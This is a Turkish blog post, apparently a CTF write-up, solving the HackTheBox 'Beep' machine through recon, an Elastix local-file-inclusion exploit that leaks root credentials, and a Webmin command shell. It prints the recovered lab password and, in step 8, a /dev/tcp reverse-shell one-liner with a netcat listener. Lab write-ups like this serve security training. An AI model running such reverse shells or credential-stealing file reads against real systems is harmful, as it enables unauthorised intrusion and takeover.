Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Hackthebox Beep Çözümü

Hackthebox Beep Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 4 dk okuma süresi
204 0

Merhabalar bu yazımda Hackthebox Beep Çözümü sizler için paylaştım.

1- İlk olarak nmap taraması ile başlıyorum.  12 port açık olduğunu tespit ettik, incelediğimde 10000. Port açık Miniserv 1.570 versiyonu var buradan exploit araştırabiliriz.

80.portu inceleyecek olursak Apache CENTOS var buradan da ilerleyebiliriz. Birçok port var hepsini araştırmaya başladım ama pek işe yarar bir şey bulamadım devam edebiliriz.

Gobuster ve nikto ile de keşif yaptım ve işe yarar bir şey çıkmadı.

2- Ana sayfaya gitmeye çalıştığımda secure connection failed olarak bir hata aldım TLS.1.2 protocol olarak gözüküyor ve bunu tarayıcıdan ayarlamadan siteye erişmemiz pek mümkün değil.

Varsayılan olanı değiştirerek devam edelim.

3-  Tarayıcı sekmesine gelip about:config yazalım. Bu paramatreler ile Firefox içerisinde detaylı olarak düzenlemeler ve ayarlamalar yapabiliriz.

4-  security.tls.versiyon.min 1 olarak ayarlayalım çıkalım. Firefox içerisinde TLS varsayılanı 3 olarak geliyor.

1 ayarlamadan direkt olarak SSL üzerinden 80 ve 443 portları üzerinden siteye erişemeyiz. Ayarlamaları devam edip siteye tekrardan giriş yapmaya çalışalım.

5- Sitenin ana sayfaya girdiğimizde bizi login ekranı karşılıyor. Elastix olarak login paneli var.

Versiyonuna göre araştırma yaptığımda bir tane exploit keşfettim.

Bu exploit ile direkt  olarak LFI açığı ile kullanıcı bilgileri ve parolaların ele geçirilebileceği açıklanıyor.

LFI exploit üzerindeki alanı kopyaladım ve sitemize yapıştıralım.

İlginizi çekebilecek yazımız: WordPress LiteSpeed Eklentisinde Güvenlik Açığı Ortaya Çıktı

6- Config bilgilerini direkt olarak çektik. İncelediğimde kullanıcı adı ve parolayı tespit ettim. Artık direkt olarak root olup sisteme erişebiliriz.

User: root

Password: jEhdlekWmdjE

Hatırlarsak Webmin olduğunu tespit etmiştik bilgiler ile webmin üzerinden giriş yapmaya çalışalım.

3 farklı yoldan root olabiliriz. Bunlar;

  • ssh 10.10.10.7 yazarak gidip parolayı girerek root olabiliriz.
  • Elaxtic paneli üzerinden giriş yapıp Shell alarak root olabiliriz.
  • Webmin üzerinden giriş yapıp Shell alıp root olabiliriz.

Ben farklı yöntem tercih ederek webmin üzerinden gösterdim sizler diğer adımlardan da hızlıca root olabilirsiniz.

7- https://10.10.10.7:10000 port yaparak webmin login ekranına gidelim.  

Bilgiler ile içeriye giriş yapıyoruz.

Hackthebox Beep Çözümü

8- Others tıkladık ve Command Shell alanına tıklayalım.

Öncesinde ncat -lvnp 4444 olarak 4444.portunu dinlemeye alalım.

/bin/sh -i >& /dev/tcp/local ip adresiniz/4444 0>&1 dedik ve execute command tıkladığımızda direkt olarak shell kabuğu aktif olacaktır.

Hackthebox Beep Çözümü

9-  İd olarak baktığımızda root olduğumuzu görüyoruz.

Sırasıyla cat /root/root.txt olarak root flağını tespit ettik.

cat /home/fanis/user.txt olarak da user flağını bulduk.

Hackthebox Beep Çözümü yazımızın sonuna geldik, yeni yazılarda görüşmek üzere sağlıcakla kalın…

Hackthebox Beep Çözümü

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir